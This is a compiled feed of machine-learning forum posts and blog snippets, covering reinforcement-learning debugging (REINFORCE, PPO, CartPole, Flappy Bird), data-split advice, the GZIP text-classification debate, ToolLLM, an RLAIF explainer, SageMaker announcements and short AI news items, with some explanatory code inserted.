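                self.action_callback = action_callback  # None => external policy

        class World:
            def __init__(self, agents):
                self.agents = agents

            @property
            def policy_agents(self):
                return [a for a in self.agents if a.action_callback is None]

            @property
            def scripted_agents(self):
                return [a for a in self.agents if a.action_callback is not None]

            def step(self, external_actions):
                """external_actions: dict name -> action for policy agents.
                Scripted agents compute their own action via the callback."""
                actions = {}
                for a in self.policy_agents:
                    actions[a.name] = external_actions[a.name]
                for a in self.scripted_agents:
                    actions[a.name] = a.action_callback(a, self)
                return actions

        # A fixed chasing policy would live in the callback:
        chaser = Agent("chaser", action_callback=lambda a, w: "move_toward_target")
        learner = Agent("learner")
        world = World([chaser, learner])
        print(world.step({"learner": "accelerate_left"}))

    The point of the pattern: the training loop only supplies actions for policy_agents, while scripted_agents are stepped inside the environment itself, so both sides advance in the same step call.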
    Training Cartpole using policy gradient and gradient tape of tensorflow is not converging.
    I am trying to train the CartPole environment using the policy gradients algorithm. I want to train using the GradientTape method of TensorFlow. I have been trying for a long time, but it still hasn't converged. What am I doing wrong?

        import tensorflow as tf
        from tensorflow import keras
        from tensorflow.keras import layers
        import numpy as np
        import keras.backend as K
        import matplotlib.pyplot as plt

        class PolicyGradientModel(keras.Model):
            def __init__(self, num_actions):
                super().__init__()
                self.hidden1 = layers.Dense(24, activation='relu')
                self.hidden2 = layers.Dense(120, activation='relu')
                self.out = layers.Dense(num_actions, activation='softmax')

            def call(self, inputs):
                x = self.hidden1(inputs)
                x = self.hidden2(x)
                return self.out(x)

            def action_prob(self, state):
                prob = self.predict(np.ex…  ( 9 min )
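    Since the snippet above is truncated, here is a framework-agnostic sketch of one piece that often goes wrong in REINFORCE implementations - the discounted, normalized returns. This is an illustration of the technique, not a diagnosis of the poster's code:

        import numpy as np

        def discounted_returns(rewards, gamma=0.99, normalize=True):
            """Compute G_t = r_t + gamma * G_{t+1} over one episode.

            Normalizing returns to zero mean / unit std often stabilizes
            REINFORCE on CartPole; without it the gradient scale drifts
            with episode length.
            """
            G = np.zeros(len(rewards), dtype=np.float64)
            running = 0.0
            for t in reversed(range(len(rewards))):
                running = rewards[t] + gamma * running
                G[t] = running
            if normalize:
                G = (G - G.mean()) / (G.std() + 1e-8)
            return G

        # e.g. rewards [1, 1, 1] with gamma=0.5 gives G = [1.75, 1.5, 1.0]
        print(discounted_returns([1.0, 1.0, 1.0], gamma=0.5, normalize=False))

    One other thing worth checking in TensorFlow code like the above: model.predict() returns NumPy arrays and runs outside the tape, so the log-probabilities used in the loss must come from calling the model directly (model(states)) inside tf.GradientTape, or no gradients will flow.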
    How can I make my vectorized PPO implementation learn better?
    Here is my vectorized PPO implementation, which I wrote (with a lot of help from this community). These are my results on the Acrobot-v1 environment. The way I computed the reward for my vectorized implementation was to add up the rewards across all environments. An ideal Acrobot agent should receive a reward of 0. Please let me know if I am missing any information or if any clarification is required. I skipped a part that was suggested by the community a few months ago - updating the gradients using minibatches. The reason I skipped it is that I don't understand how it works, and anyway Acrobot should be an easy environment to learn. https://preview.redd.it/0vs9ur585mfb1.png?width=622&format=png&auto=webp&s=ebc007a9f797bd0b97b805d010dbd097c0be8906 Also, I keep getting this error at the end of my code, but I haven't bothered fixing it as it doesn't seem to affect my algorithm:

        Exception ignored in: Traceback (most recent call last):
          File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\gym\vector\vector_env.py", line 139, in __del__
          File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\gym\vector\vector_env.py", line 121, in close
          File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\gym\vector\async_vector_env.py", line 327, in close_extras
        AttributeError: 'NoneType' object has no attribute 'TimeoutError'

    submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
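    On the skipped minibatch part: the idea is just to re-shuffle the collected rollout each epoch and take a gradient step per small index chunk instead of one step on the whole batch. A sketch of the bookkeeping (ppo_loss and the optimizer lines in the comment are placeholders, not code from the linked implementation):

        import numpy as np

        def minibatch_indices(batch_size, minibatch_size, rng=None):
            """Shuffle 0..batch_size-1 and yield minibatch-sized index chunks.

            In PPO, each epoch re-shuffles the collected rollout, and the
            surrogate loss plus a gradient step is applied once per chunk
            rather than once on the whole batch.
            """
            rng = rng or np.random.default_rng(0)
            idx = rng.permutation(batch_size)
            for start in range(0, batch_size, minibatch_size):
                yield idx[start:start + minibatch_size]

        # Hypothetical usage inside an update loop:
        # for epoch in range(n_epochs):
        #     for mb in minibatch_indices(len(obs), 64):
        #         loss = ppo_loss(obs[mb], actions[mb], logp_old[mb], adv[mb])
        #         optimizer.zero_grad(); loss.backward(); optimizer.step()

    Acrobot may indeed learn without this, but minibatching usually improves sample efficiency and keeps updates within the trust region the clipped objective assumes.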
    [P] Project Cost Forecasting
    Hi guys, this is my first post. I am building my first machine learning model to predict the costs of various projects by month. Each row can be identified by a project name column and a month column (these two are dropped for testing). The rest of the columns are various features that can help predict the end project cost. I want to be able to predict costs on a monthly basis. My question is how I should split the data, given that each row is a unique project and month. Is it ok to just do a random train/test split, so earlier project months can end up in the testing set while future project months end up in the training set? Isn't that giving the model too much information? Or should I train on all but one project and hold one project out as the test set, rotating through each project I have? I'm worried about overfitting with that one. Thanks in advance for any help! submitted by /u/Single_Swing_3173 [link] [comments]  ( 9 min )
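    For what it's worth, a chronological cutoff split is the usual answer to this kind of leakage worry: fit on all months up to a cutoff date and test on the months after it, so the model never sees "the future" at fit time. A tiny sketch with made-up rows (the (project, month, cost) layout is an assumption):

        from datetime import date

        # Toy rows: (project, month, cost); real rows would carry more features.
        rows = [
            ("A", date(2023, 1, 1), 10.0),
            ("A", date(2023, 2, 1), 12.0),
            ("B", date(2023, 1, 1), 8.0),
            ("B", date(2023, 3, 1), 9.5),
        ]

        def time_split(rows, cutoff):
            """Chronological split: train on months <= cutoff, test on the rest."""
            train = [r for r in rows if r[1] <= cutoff]
            test = [r for r in rows if r[1] > cutoff]
            return train, test

        train, test = time_split(rows, date(2023, 1, 31))
        print(len(train), len(test))  # -> 2 2

    The leave-one-project-out scheme is the complementary check: it tests whether the model generalizes to unseen projects rather than unseen months, and running both splits tells you more than either alone.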
    [Project] Help needed - Monte carlo policy gradient - reinforce alg on flappy bird
    I am trying to implement REINFORCE (Monte Carlo policy gradient) on Flappy Bird (flappy-bird-gymnasium) and I am unable to make the AI cross even a single pipe. The average score stays constant across all episodes from start to end, and (sometimes) there is no change in the policy loss either. I tried a lot of different hyperparameter combinations as well. I have checked the policy (neural network) and the algorithm code multiple times and they seem to be fine. I am just not able to determine why the AI isn't learning. If someone can help me out, it would be really helpful! code - https://github.com/Sookeyy-12/REINFORCE_Projects there's also a video of the agent's gameplay in this repo. submitted by /u/Sookeyy [link] [comments]  ( 9 min )
    [D] IJCNLP-AACL 2023: Paper Reviews
    The paper reviews for AACL 2023 are out, feel free to share your thoughts and feelings! How did you do? submitted by /u/Pomhelpme [link] [comments]  ( 8 min )
    [R] GZIP vs Bag-of-Words for text classification
    Hi, like other folks, I was quite curious about the recent GZIP paper presented at ACL 2023, where the authors demonstrate strong text classification performance by using a compression-based distance function in a KNN model. However, in the end, I am not sure whether GZIP can fully live up to the hype. I tested a very simple bag-of-words distance and found that it can achieve better results than GZIP, while also being faster. In a nutshell, I think we can say that: Yes, KNN (with some sensible distance function) is an interesting approach, particularly for few-shot/low-resource scenarios. No, GZIP (even though it's a cool idea) is not a very sensible distance function. Simply using a bag-of-words achieves better results, and is much faster. Here's my full write-up: https://arxiv.org/abs/2307.15002 [PS: A short comment on the GZIP evaluation issue that has been widely discussed. Indeed, as was also shown in a popular blog post, the accuracy reported for GZIP in the original paper is optimistic. Therefore, I show correct/realistic accuracy numbers for all methods that I tested. However, the main point of my note is not to make a SOTA comparison, but rather to provide a reminder that bag-of-words is a good starter method and a strong baseline, and can perform better than the more complex GZIP for KNN classification] submitted by /u/juopitz [link] [comments]  ( 9 min )
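For readers who want to see the two distances side by side, here is a stdlib sketch: the normalized compression distance used in the GZIP paper, and the simple bag-of-words cosine distance the write-up compares it against (both plug directly into a KNN classifier):

```python
import gzip
from collections import Counter
from math import sqrt

def ncd(a: str, b: str) -> float:
    """Normalized compression distance, the metric from the GZIP paper:
    (C(ab) - min(C(a), C(b))) / max(C(a), C(b))."""
    ca = len(gzip.compress(a.encode()))
    cb = len(gzip.compress(b.encode()))
    cab = len(gzip.compress((a + " " + b).encode()))
    return (cab - min(ca, cb)) / max(ca, cb)

def bow_cosine_distance(a: str, b: str) -> float:
    """1 - cosine similarity over raw word counts: the bag-of-words
    baseline, which needs no compression calls at all."""
    va, vb = Counter(a.lower().split()), Counter(b.lower().split())
    dot = sum(va[w] * vb[w] for w in va)
    na = sqrt(sum(c * c for c in va.values()))
    nb = sqrt(sum(c * c for c in vb.values()))
    return 1.0 - dot / (na * nb)
```

The speed gap comes from the fact that NCD recompresses every pair, while bag-of-words vectors are computed once per document.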
    [P] Prove your identity directly via language model output
    Hi guys, I built something that you might enjoy. Totally free and open source. Basically it lets you create text that you can prove came from you. For example, in my colab demo: https://colab.research.google.com/drive/1764iRR-EFJl43KIKhrb2H0CTcT0b1vQm?authuser=2#scrollTo=qyKud8qtM3vA I prove that I generated the text: 'The world is constantly changing due to technological advancements, which include the creation of powerful language models and advanced robotics technologies. A Computer Science degree can help one be involved in these changes and apply their knowledge to everyday life, as practical applications of technology.' The text is a bit wonky as the generation model is just a small paraphrasing fine-tuned model I pulled off Hugging Face, but it's pretty natural even at this earl…  ( 9 min )
    [D] Clustering a dataset of images with OpenPose
    Hey everyone! I've got a rather large dataset of images, mostly featuring humans in a variety of poses (think along the lines of a collection of people practicing yoga and the like). My goal is to cluster these images based on the poses, so I can avoid the tedious task of manually sifting through each one to find all the people doing handstands, splits, and so forth. My initial thought was to run OpenPose on all these images, then perform clustering based on the output from OpenPose. Does this sound like a feasible approach? Do any of you have better suggestions? Or perhaps there's already an existing software solution that can do this? Thanks! submitted by /u/cyan2k [link] [comments]  ( 9 min )
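The OpenPose-then-cluster plan is feasible; the main gotcha is making keypoints comparable across images before clustering. A hedged sketch of that normalization step (keypoints as (x, y) tuples; the helper name is made up), after which any standard clustering such as k-means on the flattened vectors applies:

```python
def normalize_pose(keypoints):
    """Center a skeleton's (x, y) keypoints on their mean and divide by
    their spread, so the same pose at different positions and scales in
    the image maps to (nearly) the same feature vector."""
    xs = [x for x, _ in keypoints]
    ys = [y for _, y in keypoints]
    cx, cy = sum(xs) / len(xs), sum(ys) / len(ys)
    spread = max(max(abs(x - cx) for x in xs),
                 max(abs(y - cy) for y in ys)) or 1.0
    return [((x - cx) / spread, (y - cy) / spread) for x, y in keypoints]
```

Without this step, two people doing the same handstand at different image positions would land in different clusters purely because of pixel coordinates.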
    [News] Kornia v0.7.0 release: Image API, RT-DETR and Object Detection API, LightGlue Matcher, MobileSam, new Sensors API and many more.
    Read the release notes: https://github.com/kornia/kornia/releases/tag/v0.7.0 -------------------- Image API In this release we have added a new Image API as a placeholder to support a more generic multi-backend API. You can export/import from files, numpy and dlpack. https://preview.redd.it/0d5tvjxmeofb1.png?width=621&format=png&auto=webp&s=9af05a037770132c9a267b68dcd9ab8182557517 Object Detection API We have added the ObjectDetector that includes by default the RT-DETR model. The detection pipeline is fully configurable by supplying a pre-processor, a model, and a post-processor. Example usage is shown below https://preview.redd.it/rtbayqpneofb1.png?width=680&format=png&auto=webp&s=4d46edeeee4027e08a493cb15182ea0ddc42bc5d https://preview.redd.it/ukcg9enoeofb1.png?width=680&format=png&a…  ( 9 min )
    [D] Pose Estimation over Mid Range
    I have been testing OpenFace with some telescope lenses (focal length 8-16mm) to test the performance of the pose estimation at mid range (2-4 meters). I have been passing the camera and lens intrinsics to OpenFace but have been finding that the pose estimation has not been great. Does anyone with more ML experience know at what point in the OpenFace pipeline the issues could be coming from? e.g. the point distribution model or the training data submitted by /u/DoPe-_-SoaP [link] [comments]  ( 8 min )
    [R] Model to refine a binary segmentation mask using optical flow.
    Hi, this is my first time posting here. My goal is to check whether optical flow can improve a pretrained model's performance. The pretrained model outputs a binary mask for the object it's trying to detect. Optical flow is the motion of pixels between frames; this model also gives an image-shaped flow vector. I want to combine the pretrained model's mask with the optical flow information and feed them to another model to improve performance. For that model, I could use a U-Net or a simple convolutional encoder-decoder, but I am confused about which architecture would work best. submitted by /u/luxuryBubbleGum [link] [comments]  ( 9 min )
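Before the architecture choice, the simplest way to combine the two signals is early fusion: stack the mask and the flow components channel-wise and feed the result to the refinement network. A toy nested-list sketch of that stacking (in practice this would be a tensor concatenation along the channel axis):

```python
def stack_inputs(mask, flow_x, flow_y):
    """Early fusion: concatenate the binary mask and the two optical-flow
    components per pixel, giving each pixel a 3-value feature that a
    U-Net or encoder-decoder refinement model can consume.  Each
    argument is an H x W nested list."""
    h, w = len(mask), len(mask[0])
    return [[[mask[i][j], flow_x[i][j], flow_y[i][j]]
             for j in range(w)] for i in range(h)]
```

With this input format, either a U-Net or a plain encoder-decoder works; the U-Net's skip connections mainly help preserve the mask's fine boundaries.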
    [D] Are there any free LLM GPTs that I can access via API?
    I am trying to develop some app ideas based on LLMs (e.g., summarizing and extracting entities from articles), but I can't afford any paid API access right now (including OpenAI). Are there free alternatives? submitted by /u/Guyserbun007 [link] [comments]  ( 8 min )
    [D] How to test/fine-tune a model using a new data type that has different arithmetics for basic operations (+,-,/,*) compared to float in Pytorch?
    Hi, I want to use a new data representation instead of float for fine-tuning/testing a model (e.g., a DNN) in PyTorch. The basic operations (add/sub/multiply/divide) in my data type differ from floating point. My question is whether it is possible to implement these operations (+,-,*,/) and force all PyTorch functions (e.g., torch.add(), torch.sum(), torch.nn.Linear(), conv2d, etc.) to use my arithmetic implementation. If so, could you please guide me on how to do it? Otherwise it would take a lot of time and effort: first I would have to find which functions my model calls (which I don't know how to do), and then replace them one by one, which becomes complicated for a large model. I found this link from PyTorch that shows how to extend PyTorch, but it doesn't seem comprehensive enough to answer my question. Thank you very much! submitted by /u/Impossible-Froyo3412 [link] [comments]  ( 9 min )
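For the mechanism itself: the "Extending PyTorch" page the poster links documents a single hook, `__torch_function__`, that a tensor-like class can implement once to intercept calls in the torch namespace (torch.add, torch.sum, and so on) without patching each function individually. A plain-Python analogue of the underlying idea, operator dispatch through one type, where the saturating arithmetic is an invented stand-in for any custom number format:

```python
class Custom:
    """Toy numeric type with its own arithmetic: addition and
    multiplication saturate at CAP instead of behaving like float.
    Python routes the +, -, *, / operators to these dunder methods;
    PyTorch's analogous hook for its whole function namespace is
    __torch_function__, so the model's calls need not be found and
    replaced one by one."""
    CAP = 100.0

    def __init__(self, v):
        self.v = float(v)

    def __add__(self, other):
        return Custom(min(self.v + other.v, self.CAP))

    def __mul__(self, other):
        return Custom(min(self.v * other.v, self.CAP))
```

This is a sketch of the dispatch idea only; a real PyTorch integration would implement `__torch_function__` (or `__torch_dispatch__`) on a tensor subclass as described in the official docs.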
    DSC Webinar Series: OCI & HARC: Modernizing Workloads in the Oracle Cloud
    The convergence of Oracle Cloud Infrastructure (OCI) and Hitachi Application Reliability Centers (HARC) to magnify outcomes for customers. Tech giants Oracle and Hitachi Vantara are marching together to magnify cloud outcomes. Join us for the Oracle and Hitachi Vantara virtual event, where we discuss how businesses can get the most out of OCI and HARC.… Read More »DSC Webinar Series: OCI & HARC: Modernizing Workloads in the Oracle Cloud The post DSC Webinar Series: OCI & HARC: Modernizing Workloads in the Oracle Cloud appeared first on Data Science Central.  ( 18 min )
    Emerging AI statistics and trends to watch
    Artificial intelligence, or AI, has often been depicted as a terrifying force, from HAL 9000’s chilling declaration in “2001: A Space Odyssey” to the apocalyptic machine uprising in the Terminator movies. However, in reality, AI has become an integral part of our daily lives, with AI-powered Android devices in our pockets. Though we may not… Read More »Emerging AI statistics and trends to watch The post Emerging AI statistics and trends to watch appeared first on Data Science Central.  ( 20 min )
    Build a personalized avatar with generative AI using Amazon SageMaker
    Generative AI has become a common tool for enhancing and accelerating the creative process across various industries, including entertainment, advertising, and graphic design. It enables more personalized experiences for audiences and improves the overall quality of the final products. One significant benefit of generative AI is creating unique and personalized experiences for users. For example, […]  ( 14 min )
    SageMaker Distribution is now available on Amazon SageMaker Studio
    SageMaker Distribution is a pre-built Docker image containing many popular packages for machine learning (ML), data science, and data visualization. This includes deep learning frameworks like PyTorch, TensorFlow, and Keras; popular Python packages like NumPy, scikit-learn, and pandas; and IDEs like JupyterLab. In addition to this, SageMaker Distribution supports conda, micromamba, and pip as Python […]  ( 6 min )
    Automate caption creation and search for images at enterprise scale using generative AI and Amazon Kendra
    Amazon Kendra is an intelligent search service powered by machine learning (ML). Amazon Kendra reimagines search for your websites and applications so your employees and customers can easily find the content they are looking for, even when it’s scattered across multiple locations and content repositories within your organization. Amazon Kendra supports a variety of document […]  ( 13 min )
    Research Focus: Week of July 31, 2023
    In this edition: A new anonymous token protocol balances fraud detection and privacy; survival instinct in offline RL; Nimble offers rollback protection for confidential cloud services; improved machine learning force fields for molecular dynamics. The post Research Focus: Week of July 31, 2023 appeared first on Microsoft Research.  ( 11 min )
    Human Brain Models (Literature Review of the Latest BNN and SNN Endeavors)
    submitted by /u/No-Platypus4021 [link] [comments]  ( 8 min )

    [Discussion] Supervised fine-tuning vs Prompt Engineering with retrieval for LLMs
    Hello all, I am delving into the exciting realm of GenAI and LLMs. I have a few questions I hope you can help me with: When should I opt for supervised fine-tuning rather than prompt engineering with retrieval? What are the associated costs of supervised fine-tuning? How many high-quality observations are typically required for successful supervised fine-tuning? What frameworks and computational requirements are usually involved in supervised fine-tuning, and how can I implement them in code? Are there any tutorials available? Can the model adapt and learn new jargon or specific tasks that might not be extensively covered during the pre-training phase? I understand that a combination of supervised fine-tuning and reinforcement learning with human feedback through a reward model is considered the best approach. However, given that the latter method can be costly and falls under the domain of heavy research, it is probably less feasible for medium-sized organizations. submitted by /u/quilograma [link] [comments]  ( 9 min )
    [D] predicting domain mapping difficulty
    I went down this rabbit hole of trying to understand when domain mapping approaches like StarGAN or Mind the Gap succeed and fail. For example, it should be easy to map males (source domain) with large eyes and brown hair onto females (target domain) with analogous eye and hair color. It should be relatively harder to map different car models onto images taken of one German Shepherd dog at different ages. This makes intuitive sense, and the terms "domain misalignment" and "large domain shift" come to mind, but I cannot find an in-depth discussion of this topic. Any thoughts? submitted by /u/Rotfisch [link] [comments]  ( 9 min )
    [D] NeurIPS 2023 Paper Reviews
    NeurIPS 2023 paper reviews are visible on OpenReview. See this tweet. I thought to create a discussion thread for us to discuss any issue/complain/celebration or anything else. There is so much noise in the reviews every year. Some good work that the authors are proud of might get a low score because of the noisy system, given that NeurIPS is growing so large these years. We should keep in mind that the work is still valuable no matter what the score is. submitted by /u/zy415 [link] [comments]  ( 8 min )
    [R] ToolLLM: Facilitating Large Language Models to Master 16000+ Real-world APIs - WeChat AI, Tencent Inc. 2023 - Open-source! Comparable performance to ChatGPT while using tools!
    Paper: https://arxiv.org/abs/2307.16789 Github: https://github.com/OpenBMB/ToolBench Abstract: Despite the advancements of open-source large language models (LLMs) and their variants, e.g., LLaMA and Vicuna, they remain significantly limited in performing higher-level tasks, such as following human instructions to use external tools (APIs). This is because current instruction tuning largely focuses on basic language tasks instead of the tool-use domain. This is in contrast to state-of-the-art (SOTA) LLMs, e.g., ChatGPT, which have demonstrated excellent tool-use capabilities but are unfortunately closed source. To facilitate tool-use capabilities within open-source LLMs, we introduce ToolLLM, a general tool-use framework of data construction, model training and evaluation. We first …  ( 9 min )
    [P] - VkFFT version 1.3 released - major design and functionality improvements
    Hello, I am the creator of VkFFT, the GPU Fast Fourier Transform library for Vulkan/CUDA/HIP/OpenCL/Level Zero and Metal. FFTs are used by many algorithms, not only for signal processing. For example, you can efficiently calculate convolutions with them, which has applications in CNNs and feature generation. I used to post about the latest features implemented in the codebase, and there has been a major update released today. It brings: -Major library design change - from a single-header to a multiple-header approach, which improves structure and maintainability. Now instead of copying a single file, the user has to copy the vkFFT folder contents. -VkFFT has been rewritten to follow the multiple-level platform structure described in the VkFFT whitepaper. All algorithms have been split into res…  ( 9 min )
    [P] dora-rs: experimental ROS2 alternative up to 17x faster for Python API, making more robotics accessible for AI users
    https://github.com/dora-rs/dora submitted by /u/haixuanxaviertao [link] [comments]  ( 8 min )
    [D] Reinforcement Learning from AI Feedback
    Hey everyone, As many of you probably know, Reinforcement Learning from Human Feedback (RLHF) was the core technique used to produce ChatGPT and the similar AI assistants that followed. RLHF replaces direct human feedback in an RL scheme with a preference model trained on a dataset of human preferences. Anthropic has devised an extension of this idea in which an AI model (rather than humans) generates the data that ultimately trains the preference model. This method, called Reinforcement Learning from AI Feedback, uses a "constitution" to guide the feedback model in terms of which outputs are preferable to others. I go over the research in How Reinforcement Learning from AI Feedback Works. In short, the authors find that they are able to train a non-evasive, harmless agent using a short constitution. The method is found to be superior to RLHF, and constitutes a Pareto improvement over RLHF models. https://preview.redd.it/qaivl8f1ljfb1.png?width=1179&format=png&auto=webp&s=a0941f2ce0ccdcf0557cf19b7f4b48fa712a66f2 Let me know what you think, I'm happy to answer any questions! submitted by /u/SleekEagle [link] [comments]  ( 9 min )
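Whether the pairwise labels come from humans (RLHF) or from an AI labeler guided by a constitution (RLAIF), the preference model itself is typically trained with the same Bradley-Terry style objective. A minimal sketch, with scalar rewards standing in for the reward model's outputs on the chosen and rejected responses:

```python
from math import exp, log

def preference_loss(r_chosen, r_rejected):
    """-log sigmoid(r_chosen - r_rejected): small when the reward model
    scores the preferred response higher than the rejected one, large
    when it ranks the pair backwards."""
    return -log(1.0 / (1.0 + exp(-(r_chosen - r_rejected))))
```

Summed over a dataset of labeled pairs, this loss trains the preference model that then supplies the reward signal for the RL stage.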
    [R] Any ML professionals mind helping out with an academic survey?
    Hi there, First off, apologies if this kind of post isn't allowed. I tried messaging the mods in advance, but didn't get a reply. Of course feel free to delete if it's not. I'm an academic at the University of Cambridge's Computer Lab, and I'm looking to get some insights from people that work with algorithmic systems (e.g. ML systems) in a professional capacity. The aim of the research is to document some of the approaches, attitudes, and challenges associated with record-keeping for these types of systems, and write them up for an academic conference. If you're a professional working with algorithmic/ML systems, and happen to have a spare ~20 minutes, would you mind answering some questions? The link to the questionnaire is here: https://cambridge.eu.qualtrics.com/jfe/form/SV_3n6RuowNogZKG34 Thanks very much! I'd be more than happy to come back and share the results/paper here if that's of interest to people? submitted by /u/cnorval [link] [comments]  ( 9 min )
    [Project] GZip+KNN Official Package Released
    The official python package for the "'Low-Resource' Text Classification: A Parameter-Free Classification Method with Compressors" has now been released on pypi: npc-gzip v0.1.0 Abstract: Deep neural networks (DNNs) are often used for text classification due to their high accuracy. However, DNNs can be computationally intensive, requiring millions of parameters and large amounts of labeled data, which can make them expensive to use, to optimize, and to transfer to out-of-distribution (OOD) cases in practice. In this paper, we propose a non-parametric alternative to DNNs that’s easy, lightweight, and universal in text classification: a combination of a simple compressor like gzip with a k-nearest-neighbor classifier. Without any training parameters, our method achieves results that are competitive with non-pretrained deep learning methods on six in-distribution datasets. It even outperforms BERT on all five OOD datasets, including four low-resource languages. Our method also excels in the few-shot setting, where labeled data are too scarce to train DNNs effectively. This paper has made some waves on this subreddit and in the community in general over the last 2 weeks. We've seen the bugs around training/testing data leakages and varying claims in accuracy. Our hope with this package is to get the code into everyone's hands, first to solve whatever use case you currently have for this technology, and second to make the code more readily available for additional community testing. Links: * https://pypi.org/project/npc-gzip/ * https://github.com/bazingagin/npc_gzip * https://aclanthology.org/2023.findings-acl.426/ submitted by /u/dfcHeadChair [link] [comments]  ( 9 min )
    [D] Google updates "Attention is all you need" paper with a warning + crossed authors
    submitted by /u/Jean-Porte [link] [comments]  ( 8 min )
    [R] Probabilistic Imputation for Time-series Classification with Missing Data
    This is one of the ICML 2023 papers I focused in on in a sea of LLM stuff. Trying to figure out simple ways to implement this and adapt it to regression problems. Thoughts? submitted by /u/quantthrowaway69 [link] [comments]  ( 8 min )
    [P] Video-to-Text model descriptive style (not subtitles)
    I was wondering if there's already something like CLIP (the model that looks at an image and describes it), but for videos. So you show a video of, say, a dog jumping and grabbing a tennis ball and it outputs "dog grabbing a tennis ball", something like that. My first thought was object detection, and input that interaction of the objects (tennis ball, dog) to the model with the target being "dog grabbing tennis ball". My ultimate goal being real-time description for, say, sports casting. I'm sure something like this is what cars use to drive themselves, or not? Any info is appreciated! submitted by /u/Yip37 [link] [comments]  ( 9 min )
    What do simulations mean in the context of the AlphaGoZero paper?
    Can someone please help me with this question? Please let me know if any clarification is needed. Thanks so much! submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
    Drone for Research
    I'm currently working on a research project that involves using deep reinforcement learning with drones. I'm looking for recommendations on drones that would be suitable for this type of research. I am looking for something off the shelf. submitted by /u/anointedninja [link] [comments]  ( 8 min )
    Making a reinforcement learning code(in python) that can play a game with visual data only.
    So I want to make a bot that can play a game using only visual data and no other fancy stuff. I did manage to get all the data I need (I hope) using code that uses OpenCV to extract data in real time. Example: Player: ['Green', 439.9180603027344, 461.7232666015625, 13.700743675231934] Enemy Data: {0: [473.99951171875, 420.5301513671875, 'Green', 20.159990310668945]} Box: {0: [720, 605, 'Green_box'], 1: [957, 311, 'Green_box'], 2: [432, 268, 'Red_box'], 3: [1004, 399, 'Blue_box']} Can anyone suggest a way to make one? Rules: You can only move in the direction of the mouse. You can dash in the direction of the mouse with LMB. You can collect boxes to gain HP and change colors. Red kills Blue, Blue kills Green, Green kills Red. There is a fixed screen. You lose 25% of total HP when you dash. You lose 50% of HP when you bump into players of a color that kills yours, or whose HP is greater than yours. Visualization of data. submitted by /u/SIJ_Gamer [link] [comments]  ( 9 min )
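As a starting point, the parsed OpenCV output shown above can be flattened into a fixed-length state vector that a standard policy-gradient or DQN agent can consume. A sketch under stated assumptions: the color encoding, slot counts, and zero-padding scheme below are illustrative choices, not from the post:

```python
COLORS = {"Green": 0, "Red": 1, "Blue": 2}

def build_state(player, enemies, boxes, max_enemies=3, max_boxes=4):
    """Flatten the parsed observation into a fixed-length list of
    numbers.  Absent enemy/box slots are zero-padded so the input size
    never changes between frames, which a neural policy requires."""
    state = [COLORS[player[0]], player[1], player[2], player[3]]
    for i in range(max_enemies):
        if i in enemies:
            x, y, color, hp = enemies[i]
            state += [COLORS[color], x, y, hp]
        else:
            state += [0.0] * 4
    for i in range(max_boxes):
        if i in boxes:
            x, y, name = boxes[i]
            state += [COLORS[name.split("_")[0]], x, y]
        else:
            state += [0.0] * 3
    return state
```

Scaling the pixel coordinates to [0, 1] before feeding them to the network is also usually worthwhile.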
    DSC Weekly 1 August 2023
    Announcements Top Stories In-Depth The post DSC Weekly 1 August 2023 appeared first on Data Science Central.  ( 19 min )
    I bet you think this article is about ChatGPT
    Generative AI has been around for a long time. Some sources say that it appeared as early as the 1950’s. Other sources point to the first rudimentary chatbots that were introduced in the 1960’s. Whatever the true point of origin, we can all agree that those were small pebbles on the historical timeline compared to… Read More »I bet you think this article is about ChatGPT The post I bet you think this article is about ChatGPT appeared first on Data Science Central.  ( 22 min )
    Data tribalism and the AI nuance deficit
    If I could name one reason why business will face at least one more AI winter, it’s the lack of nuance in most business AI discussions. The buzz about large language models (LLMs) has sucked much of the oxygen out of the air for complementary technologies. The truth is that LLMs are no more a… Read More »Data tribalism and the AI nuance deficit The post Data tribalism and the AI nuance deficit appeared first on Data Science Central.  ( 20 min )
    DSC Webinar Series: Influence Data-Driven Decisions Based On Your Communication Style
    The post DSC Webinar Series: Influence Data-Driven Decisions Based On Your Communication Style appeared first on Data Science Central.  ( 17 min )
    The Rise of the Dual Data Scientist / Machine Learning Engineer
    There are thousands of articles explaining the differences between data scientist and machine learning engineer. Data science gets broken down even further, with data analysts contrasted to researchers. Professionals skilled in all these domains are called unicorns and believed not to exist. Indeed, they may not work for companies, and ignored when applying for a… Read More »The Rise of the Dual Data Scientist / Machine Learning Engineer The post The Rise of the Dual Data Scientist / Machine Learning Engineer appeared first on Data Science Central.  ( 21 min )
    [Discussion] Comprehensive learning resources that emphasize DEEP reinforcement learning?
    So I understand that there is the Sutton & Barto book on reinforcement learning in the sidebar. I was wondering what other resources you have used and would recommend that emphasize deep reinforcement learning, for someone who already has some experience with shallow/classical reinforcement learning and some experience with deep learning, but is new to deep reinforcement learning. submitted by /u/BornAgain20Fifteen [link] [comments]  ( 8 min )
    One-Minute Daily AI News 8/1/2023
    DoNotPay, an AI lawyer bot known as ChatGPT4, is transforming how users handle legal issues and save money. In under two years, this innovative robot has successfully overturned more than 160,000 parking tickets in cities like New York and London. Since its launch, it has resolved a total of 2 million related cases.[1] Microsoft hints Windows 11 Copilot with third-party AI plugins is almost here.[2] In an analyst note on Tuesday, the financial services arm of Swiss banking giant UBS raised its guidance for long-term AI end-demand forecast from 20% compound annual growth rate (CAGR) from 2020 to 2025 to 61% CAGR between 2022 to 2027.[3] The next generation of the successful OpenAI language model is already on the way. It has been discovered that the North American company has filed a registration application for the GPT-5 mark with the United States Patent and Trademark Office.[4] Sources: [1] https://citylife.capetown/uncategorized/donotpay-ai-bot-saves-users-money-by-overturning-parking-tickets-and-more/302279/ [2] https://www.itvoice.in/microsoft-hints-windows-11-copilot-with-third-party-ai-plugins-is-almost-here [3] https://venturebeat.com/ai/ubs-projects-61-compound-annual-growth-rate-for-ai-between-2022-and-2027/ [4] https://www.gearrice.com/update/openai-confirms-gpt-5-and-gives-us-the-first-clues-about-it/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Facts & Narratives: AI 'Not a Threat to Humanity'
    submitted by /u/Jane-in-the-jungle [link] [comments]  ( 8 min )
    Is there an AI similar to ChatGPT that I can upload an image to and it understands and describes it for me?
    Other features might include: - searching the web for the same or similar image - basing the chat prompt off the image submitted by /u/Maelasae [link] [comments]  ( 8 min )
    AI tattoo?
